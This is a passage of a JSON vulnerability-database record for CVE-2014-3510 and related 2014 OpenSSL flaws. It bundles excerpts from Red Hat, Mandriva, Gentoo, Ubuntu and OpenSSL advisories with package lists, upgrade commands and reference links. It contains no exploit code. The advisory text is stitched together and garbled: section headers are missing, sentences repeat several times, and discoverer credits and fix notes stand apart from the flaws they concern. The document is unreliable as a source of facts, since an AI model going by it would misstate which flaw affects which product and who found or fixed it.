7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nppc64:\nopenssl-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.ppc64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.ppc.rpm\nopenssl-static-1.0.1e-34.el7_0.4.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.s390x.rpm\nopenssl-static-1.0.1e-34.el7_0.4.s390.rpm\nopenssl-static-1.0.1e-34.el7_0.4.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-3505.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3506.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3507.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3508.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3509.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3510.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3511.html\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv_20140806.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFT69raXlSAg2UNWIIRAiQAAKCbp6Iou4mHuootBfgs0jm7zP/wWACgt50C\npHXxupQnHYYH+zJFOmk5u8o=\n=DwUW\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n \n The updated packages have been upgraded to the 1.0.0n version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510\n http://www.openssl.org/news/secadv_20140806.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 17007f558e739eb863c8507d520ffbc9 mbs1/x86_64/lib64openssl1.0.0-1.0.0n-1.mbs1.x86_64.rpm\n f810bbe20b2de26cb99d13ddaf0ac2fa mbs1/x86_64/lib64openssl-devel-1.0.0n-1.mbs1.x86_64.rpm\n 54d87a61ca0440dc5f344931de1ff43e mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0n-1.mbs1.x86_64.rpm\n 5b1748370e5a855cc31d3eec7673da5e mbs1/x86_64/lib64openssl-static-devel-1.0.0n-1.mbs1.x86_64.rpm\n 7e19a555629b4a2d3d4533be7786ce5e mbs1/x86_64/openssl-1.0.0n-1.mbs1.x86_64.rpm \n a9e74f2bab2878f601cfb44620c76dbb mbs1/SRPMS/openssl-1.0.0n-1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFT5HsDmqjQ0CJFipgRAhA5AJ0ZoDe2+SA7K7xk+NZLedQBVoFVvgCffPW9\n5geoq7aMnxbnw5eTuuH+iIs=\n=CK7e\n-----END PGP SIGNATURE-----\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201412-39\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 26, 2014\n Bugs: #494816, #519264, #525468\n ID: 201412-39\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\ncould result in Denial of Service or Man-in-the-Middle attacks. Please review\nthe CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL 1.0.1 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.1j\"\n\nAll OpenSSL 0.9.8 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-0.9.8z_p2\"\n\nPackages which depend on this library may need to be recompiled. Tools\nsuch as revdep-rebuild may assist in identifying these packages. \n\nReferences\n==========\n\n[ 1 ] CVE-2013-6449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6449\n[ 2 ] CVE-2013-6450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6450\n[ 3 ] CVE-2014-3505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3505\n[ 4 ] CVE-2014-3506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3506\n[ 5 ] CVE-2014-3507\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3507\n[ 6 ] CVE-2014-3509\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3509\n[ 7 ] CVE-2014-3510\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3510\n[ 8 ] CVE-2014-3511\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3511\n[ 9 ] CVE-2014-3512\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3512\n[ 10 ] CVE-2014-3513\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3513\n[ 11 ] CVE-2014-3567\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3567\n[ 12 ] CVE-2014-3568\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3568\n[ 13 ] CVE-2014-5139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5139\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-39.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. ============================================================================\nUbuntu Security Notice USN-2308-1\nAugust 07, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. When OpenSSL is used with certain\napplications, an attacker may use this issue to possibly gain access to\nsensitive information. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS\nand Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-5139)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.5\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.17\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.20\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). OpenSSL Security Advisory [6 Aug 2014]\n========================================\n\nInformation leak in pretty printing functions (CVE-2014-3508)\n=============================================================\n\nA flaw in OBJ_obj2txt may cause pretty printing functions such as\nX509_name_oneline, X509_name_print_ex et al. to leak some information from the\nstack. Applications may be affected if they echo pretty printing output to the\nattacker. OpenSSL SSL/TLS clients and servers themselves are not affected. \n\nThanks to Ivan Fratric (Google) for discovering this issue. This issue\nwas reported to OpenSSL on 19th June 2014. \n\nThe fix was developed by Emilia K\u00e4sper and Stephen Henson of the OpenSSL\ndevelopment team. This can\nbe exploited through a Denial of Service attack. \n\nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Joonas Kuorilehto and Riku Hietam\u00e4ki (Codenomicon) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 2nd July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nOpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this\nissue. This issue was reported to OpenSSL on 8th July 2014. \n\nThe fix was developed by Gabor Tyukasz. \n\n\nDouble Free when processing DTLS packets (CVE-2014-3505)\n========================================================\n\nAn attacker can force an error condition which causes openssl to crash whilst\nprocessing DTLS packets due to memory being freed twice. This can be exploited\nthrough a Denial of Service attack. \n\nThanks to Adam Langley and Wan-Teh Chang (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 6th June\n2014. \n\nThe fix was developed by Adam Langley. This can be exploited through a Denial of\nService attack. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. This can be exploited through a Denial of Service attack. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\nOpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)\n===============================================================\n\nOpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a\ndenial of service attack. \n\nOpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i. \n\nThanks to Felix Gr\u00f6bert (Google) for discovering and researching this issue. \nThis issue was reported to OpenSSL on 18th July 2014. \n\nThe fix was developed by Emilia K\u00e4sper of the OpenSSL development team. \n\nOpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i. \n\nThanks to David Benjamin and Adam Langley (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 21st July 2014. \n\nThe fix was developed by David Benjamin. \n\n\nSRP buffer overrun (CVE-2014-3512)\n==================================\n\nA malicious client or server can send invalid SRP parameters and overrun\nan internal buffer. Only applications which are explicitly set up for SRP\nuse are affected. \n\nThanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC\nGroup) for discovering this issue. This issue was reported to OpenSSL\non 31st July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20140806.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time", "sources": [ { "db": "NVD", "id": "CVE-2014-3510" }, { "db": "BID", "id": "69082" }, { "db": "VULMON", "id": "CVE-2014-3510" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127869" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "169648" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3510", "trust": 3.1 }, { "db": "BID", "id": "69082", "trust": 1.4 }, { "db": "SECUNIA", "id": "61250", "trust": 1.1 }, { "db": "SECUNIA", "id": "59710", "trust": 1.1 }, { "db": "SECUNIA", "id": "60687", "trust": 1.1 }, { "db": "SECUNIA", "id": "61184", "trust": 1.1 }, { "db": "SECUNIA", "id": "60938", "trust": 1.1 }, { "db": "SECUNIA", "id": "60684", "trust": 1.1 }, { "db": "SECUNIA", "id": "61775", "trust": 1.1 }, { "db": "SECUNIA", "id": "60493", "trust": 1.1 }, { "db": "SECUNIA", "id": "59221", "trust": 1.1 }, { "db": "SECUNIA", "id": "60221", "trust": 1.1 }, { "db": "SECUNIA", "id": "59743", "trust": 1.1 }, { "db": "SECUNIA", "id": "60778", "trust": 1.1 }, { "db": "SECUNIA", "id": "61045", "trust": 1.1 }, { "db": "SECUNIA", "id": "61017", "trust": 1.1 }, { "db": "SECUNIA", "id": "59756", "trust": 1.1 }, { "db": "SECUNIA", "id": "60921", "trust": 1.1 }, { "db": "SECUNIA", "id": "61959", "trust": 1.1 }, { "db": "SECUNIA", "id": "60917", "trust": 1.1 }, { "db": "SECUNIA", "id": "59700", "trust": 1.1 }, { "db": "SECUNIA", "id": "60803", "trust": 1.1 }, { "db": "SECUNIA", "id": "60824", "trust": 1.1 }, { "db": "SECUNIA", "id": "61100", "trust": 1.1 }, { "db": "SECUNIA", "id": "60022", "trust": 1.1 }, { "db": "SECUNIA", "id": "58962", "trust": 1.1 }, { "db": "SECTRACK", "id": "1030693", "trust": 1.1 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "LENOVO", "id": "LEN-24443", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201408-130", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2014-3510", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130868", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128248", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127861", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127869", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128387", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127799", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129721", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127790", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128297", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169648", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3510" }, { "db": "BID", "id": "69082" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127869" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-130" }, { "db": "NVD", "id": "CVE-2014-3510" } ] }, "id": "VAR-201408-0092", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44374704200000004 }, "last_update_date": "2024-07-22T22:08:01.982000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "openssl-1.0.0n", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51695" }, { "title": "openssl-0.9.8zb", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51694" }, { "title": "openssl-1.0.1i", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51696" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2308-1" }, { "title": "Debian Security Advisories: DSA-2998-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=bfd576c692d8814b2a331baf29ad367c" }, { "title": "Amazon Linux AMI: ALAS-2014-391", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-391" }, { "title": "Symantec Security Advisories: SA85 : OpenSSL Security Advisory 06-Aug-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=02a206cf2efb06aecdaf29aeca851b55" }, { "title": "oval", "trust": 0.1, "url": "https://github.com/jumanjihouse/oval " }, { "title": "wormhole", "trust": 0.1, "url": "https://github.com/jumanjihouse/wormhole " }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3510" }, { "db": "CNNVD", "id": "CNNVD-201408-130" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3510" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.9, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2014-1256.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "trust": 1.4, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:18.openssl.asc" }, { "trust": 1.4, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1127503" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2014-1297.html" }, { "trust": 1.2, "url": "http://security.gentoo.org/glsa/glsa-201412-39.xml" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69082" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1053.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60687" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60824" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60917" }, { "trust": 1.1, "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-008.txt.asc" }, { "trust": 1.1, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60938" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60921" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-08/msg00036.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-2998" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140853041709441\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141077370928502\u0026w=2" }, { "trust": 1.1, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61775" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61959" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59756" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-september/000196.html" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1030693" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:158" }, { "trust": 1.1, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15568.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61250" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61184" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61100" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61045" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61017" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60803" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60778" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60684" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60493" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60022" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59743" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59710" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59700" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58962" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1052.html" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/95164" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3505" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3510" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3506" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=17160033765480453be0a41335fa6b833691c049" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3507" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/solutions/len-24443" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3512" }, { "trust": 0.4, "url": "https://rhn.redhat.com/errata/rhsa-2014-1052.html" }, { "trust": 0.4, "url": "https://rhn.redhat.com/errata/rhsa-2014-1054.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-3505.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-3506.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-3508.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-3510.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021317" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684444" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684903" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004917" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004931" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004872" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/84" }, { "trust": 0.3, "url": "aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182969" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04426586" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04404655" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684570" }, { "trust": 0.3, 